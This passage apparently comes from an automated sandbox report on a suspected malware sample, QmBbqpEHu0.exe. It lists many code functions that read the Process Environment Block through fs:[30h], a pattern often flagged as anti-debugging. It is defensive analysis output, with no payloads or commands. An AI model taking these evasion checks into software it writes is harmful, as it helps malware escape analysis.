                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE45B1 mov eax, dword ptr fs:[00000030h]4_2_00FE45B1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107A456 mov eax, dword ptr fs:[00000030h]4_2_0107A456
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFE59C mov eax, dword ptr fs:[00000030h]4_2_00FFE59C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104C460 mov ecx, dword ptr fs:[00000030h]4_2_0104C460
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF4588 mov eax, dword ptr fs:[00000030h]4_2_00FF4588
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC2582 mov eax, dword ptr fs:[00000030h]4_2_00FC2582
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC2582 mov ecx, dword ptr fs:[00000030h]4_2_00FC2582
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF656A mov eax, dword ptr fs:[00000030h]4_2_00FF656A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF656A mov eax, dword ptr fs:[00000030h]4_2_00FF656A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF656A mov eax, dword ptr fs:[00000030h]4_2_00FF656A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0107A49A mov eax, dword ptr fs:[00000030h]4_2_0107A49A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8550 mov eax, dword ptr fs:[00000030h]4_2_00FC8550
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8550 mov eax, dword ptr fs:[00000030h]4_2_00FC8550
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104A4B0 mov eax, dword ptr fs:[00000030h]4_2_0104A4B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE53E mov eax, dword ptr fs:[00000030h]4_2_00FEE53E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0535 mov eax, dword ptr fs:[00000030h]4_2_00FD0535
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103C730 mov eax, dword ptr fs:[00000030h]4_2_0103C730
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA6C7 mov ebx, dword ptr fs:[00000030h]4_2_00FFA6C7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA6C7 mov eax, dword ptr fs:[00000030h]4_2_00FFA6C7
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF66B0 mov eax, dword ptr fs:[00000030h]4_2_00FF66B0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002750 mov eax, dword ptr fs:[00000030h]4_2_01002750
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002750 mov eax, dword ptr fs:[00000030h]4_2_01002750
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01044755 mov eax, dword ptr fs:[00000030h]4_2_01044755
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC6A6 mov eax, dword ptr fs:[00000030h]4_2_00FFC6A6
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104E75D mov eax, dword ptr fs:[00000030h]4_2_0104E75D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4690 mov eax, dword ptr fs:[00000030h]4_2_00FC4690
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4690 mov eax, dword ptr fs:[00000030h]4_2_00FC4690
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106678E mov eax, dword ptr fs:[00000030h]4_2_0106678E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF2674 mov eax, dword ptr fs:[00000030h]4_2_00FF2674
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA660 mov eax, dword ptr fs:[00000030h]4_2_00FFA660
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA660 mov eax, dword ptr fs:[00000030h]4_2_00FFA660
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010747A0 mov eax, dword ptr fs:[00000030h]4_2_010747A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDC640 mov eax, dword ptr fs:[00000030h]4_2_00FDC640
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010407C3 mov eax, dword ptr fs:[00000030h]4_2_010407C3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC262C mov eax, dword ptr fs:[00000030h]4_2_00FC262C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FDE627 mov eax, dword ptr fs:[00000030h]4_2_00FDE627
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF6620 mov eax, dword ptr fs:[00000030h]4_2_00FF6620
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8620 mov eax, dword ptr fs:[00000030h]4_2_00FF8620
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104E7E1 mov eax, dword ptr fs:[00000030h]4_2_0104E7E1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD260B mov eax, dword ptr fs:[00000030h]4_2_00FD260B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC47FB mov eax, dword ptr fs:[00000030h]4_2_00FC47FB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC47FB mov eax, dword ptr fs:[00000030h]4_2_00FC47FB
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E609 mov eax, dword ptr fs:[00000030h]4_2_0103E609
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE27ED mov eax, dword ptr fs:[00000030h]4_2_00FE27ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE27ED mov eax, dword ptr fs:[00000030h]4_2_00FE27ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE27ED mov eax, dword ptr fs:[00000030h]4_2_00FE27ED
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01002619 mov eax, dword ptr fs:[00000030h]4_2_01002619
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCC7C0 mov eax, dword ptr fs:[00000030h]4_2_00FCC7C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC07AF mov eax, dword ptr fs:[00000030h]4_2_00FC07AF
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108866E mov eax, dword ptr fs:[00000030h]4_2_0108866E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108866E mov eax, dword ptr fs:[00000030h]4_2_0108866E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8770 mov eax, dword ptr fs:[00000030h]4_2_00FC8770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD0770 mov eax, dword ptr fs:[00000030h]4_2_00FD0770
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0750 mov eax, dword ptr fs:[00000030h]4_2_00FC0750
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF674D mov esi, dword ptr fs:[00000030h]4_2_00FF674D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF674D mov eax, dword ptr fs:[00000030h]4_2_00FF674D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF674D mov eax, dword ptr fs:[00000030h]4_2_00FF674D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF273C mov eax, dword ptr fs:[00000030h]4_2_00FF273C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF273C mov ecx, dword ptr fs:[00000030h]4_2_00FF273C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF273C mov eax, dword ptr fs:[00000030h]4_2_00FF273C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC720 mov eax, dword ptr fs:[00000030h]4_2_00FFC720
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC720 mov eax, dword ptr fs:[00000030h]4_2_00FFC720
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0710 mov eax, dword ptr fs:[00000030h]4_2_00FC0710
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF0710 mov eax, dword ptr fs:[00000030h]4_2_00FF0710
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E6F2 mov eax, dword ptr fs:[00000030h]4_2_0103E6F2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E6F2 mov eax, dword ptr fs:[00000030h]4_2_0103E6F2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E6F2 mov eax, dword ptr fs:[00000030h]4_2_0103E6F2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E6F2 mov eax, dword ptr fs:[00000030h]4_2_0103E6F2
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010406F1 mov eax, dword ptr fs:[00000030h]4_2_010406F1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010406F1 mov eax, dword ptr fs:[00000030h]4_2_010406F1
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC700 mov eax, dword ptr fs:[00000030h]4_2_00FFC700
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC8F9 mov eax, dword ptr fs:[00000030h]4_2_00FFC8F9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFC8F9 mov eax, dword ptr fs:[00000030h]4_2_00FFC8F9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E908 mov eax, dword ptr fs:[00000030h]4_2_0103E908
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103E908 mov eax, dword ptr fs:[00000030h]4_2_0103E908
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104C912 mov eax, dword ptr fs:[00000030h]4_2_0104C912
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104892A mov eax, dword ptr fs:[00000030h]4_2_0104892A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0105892B mov eax, dword ptr fs:[00000030h]4_2_0105892B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FEE8C0 mov eax, dword ptr fs:[00000030h]4_2_00FEE8C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01040946 mov eax, dword ptr fs:[00000030h]4_2_01040946
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094940 mov eax, dword ptr fs:[00000030h]4_2_01094940
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100096E mov eax, dword ptr fs:[00000030h]4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100096E mov edx, dword ptr fs:[00000030h]4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0100096E mov eax, dword ptr fs:[00000030h]4_2_0100096E
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104C97C mov eax, dword ptr fs:[00000030h]4_2_0104C97C
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0887 mov eax, dword ptr fs:[00000030h]4_2_00FC0887
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01064978 mov eax, dword ptr fs:[00000030h]4_2_01064978
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01064978 mov eax, dword ptr fs:[00000030h]4_2_01064978
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4859 mov eax, dword ptr fs:[00000030h]4_2_00FC4859
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC4859 mov eax, dword ptr fs:[00000030h]4_2_00FC4859
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF0854 mov eax, dword ptr fs:[00000030h]4_2_00FF0854
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010489B3 mov esi, dword ptr fs:[00000030h]4_2_010489B3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010489B3 mov eax, dword ptr fs:[00000030h]4_2_010489B3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010489B3 mov eax, dword ptr fs:[00000030h]4_2_010489B3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD2840 mov ecx, dword ptr fs:[00000030h]4_2_00FD2840
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010569C0 mov eax, dword ptr fs:[00000030h]4_2_010569C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE2835 mov eax, dword ptr fs:[00000030h]4_2_00FE2835
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE2835 mov eax, dword ptr fs:[00000030h]4_2_00FE2835
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE2835 mov eax, dword ptr fs:[00000030h]4_2_00FE2835
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE2835 mov ecx, dword ptr fs:[00000030h]4_2_00FE2835
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE2835 mov eax, dword ptr fs:[00000030h]4_2_00FE2835
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE2835 mov eax, dword ptr fs:[00000030h]4_2_00FE2835
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFA830 mov eax, dword ptr fs:[00000030h]4_2_00FFA830
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108A9D3 mov eax, dword ptr fs:[00000030h]4_2_0108A9D3
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104E9E0 mov eax, dword ptr fs:[00000030h]4_2_0104E9E0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF29F9 mov eax, dword ptr fs:[00000030h]4_2_00FF29F9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF29F9 mov eax, dword ptr fs:[00000030h]4_2_00FF29F9
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104C810 mov eax, dword ptr fs:[00000030h]4_2_0104C810
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA9D0 mov eax, dword ptr fs:[00000030h]4_2_00FCA9D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA9D0 mov eax, dword ptr fs:[00000030h]4_2_00FCA9D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA9D0 mov eax, dword ptr fs:[00000030h]4_2_00FCA9D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA9D0 mov eax, dword ptr fs:[00000030h]4_2_00FCA9D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA9D0 mov eax, dword ptr fs:[00000030h]4_2_00FCA9D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCA9D0 mov eax, dword ptr fs:[00000030h]4_2_00FCA9D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF49D0 mov eax, dword ptr fs:[00000030h]4_2_00FF49D0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106483A mov eax, dword ptr fs:[00000030h]4_2_0106483A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106483A mov eax, dword ptr fs:[00000030h]4_2_0106483A
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC09AD mov eax, dword ptr fs:[00000030h]4_2_00FC09AD
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC09AD mov eax, dword ptr fs:[00000030h]4_2_00FC09AD
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FD29A0 mov eax, dword ptr fs:[00000030h]4_2_00FD29A0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01056870 mov eax, dword ptr fs:[00000030h]4_2_01056870
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01056870 mov eax, dword ptr fs:[00000030h]4_2_01056870
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104E872 mov eax, dword ptr fs:[00000030h]4_2_0104E872
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104E872 mov eax, dword ptr fs:[00000030h]4_2_0104E872
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0104C89D mov eax, dword ptr fs:[00000030h]4_2_0104C89D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE6962 mov eax, dword ptr fs:[00000030h]4_2_00FE6962
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE6962 mov eax, dword ptr fs:[00000030h]4_2_00FE6962
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FE6962 mov eax, dword ptr fs:[00000030h]4_2_00FE6962
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_010908C0 mov eax, dword ptr fs:[00000030h]4_2_010908C0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB8918 mov eax, dword ptr fs:[00000030h]4_2_00FB8918
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FB8918 mov eax, dword ptr fs:[00000030h]4_2_00FB8918
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108A8E4 mov eax, dword ptr fs:[00000030h]4_2_0108A8E4
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01094B00 mov eax, dword ptr fs:[00000030h]4_2_01094B00
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFAAEE mov eax, dword ptr fs:[00000030h]4_2_00FFAAEE
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FFAAEE mov eax, dword ptr fs:[00000030h]4_2_00FFAAEE
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0103EB1D mov eax, dword ptr fs:[00000030h]4_2_0103EB1D
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01088B28 mov eax, dword ptr fs:[00000030h]4_2_01088B28
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01088B28 mov eax, dword ptr fs:[00000030h]4_2_01088B28
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC0AD0 mov eax, dword ptr fs:[00000030h]4_2_00FC0AD0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF4AD0 mov eax, dword ptr fs:[00000030h]4_2_00FF4AD0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF4AD0 mov eax, dword ptr fs:[00000030h]4_2_00FF4AD0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01068B42 mov eax, dword ptr fs:[00000030h]4_2_01068B42
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01056B40 mov eax, dword ptr fs:[00000030h]4_2_01056B40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01056B40 mov eax, dword ptr fs:[00000030h]4_2_01056B40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0108AB40 mov eax, dword ptr fs:[00000030h]4_2_0108AB40
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01074B4B mov eax, dword ptr fs:[00000030h]4_2_01074B4B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01074B4B mov eax, dword ptr fs:[00000030h]4_2_01074B4B
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_0106EB50 mov eax, dword ptr fs:[00000030h]4_2_0106EB50
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8AA0 mov eax, dword ptr fs:[00000030h]4_2_00FC8AA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FC8AA0 mov eax, dword ptr fs:[00000030h]4_2_00FC8AA0
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01092B57 mov eax, dword ptr fs:[00000030h]4_2_01092B57
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01092B57 mov eax, dword ptr fs:[00000030h]4_2_01092B57
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01092B57 mov eax, dword ptr fs:[00000030h]4_2_01092B57
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_01092B57 mov eax, dword ptr fs:[00000030h]4_2_01092B57
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FF8A90 mov edx, dword ptr fs:[00000030h]4_2_00FF8A90
                Source: C:\Users\user\Desktop\QmBbqpEHu0.exeCode function: 4_2_00FCEA80 mov eax, dword ptr fs:[00000030h]4_2_00FCEA80
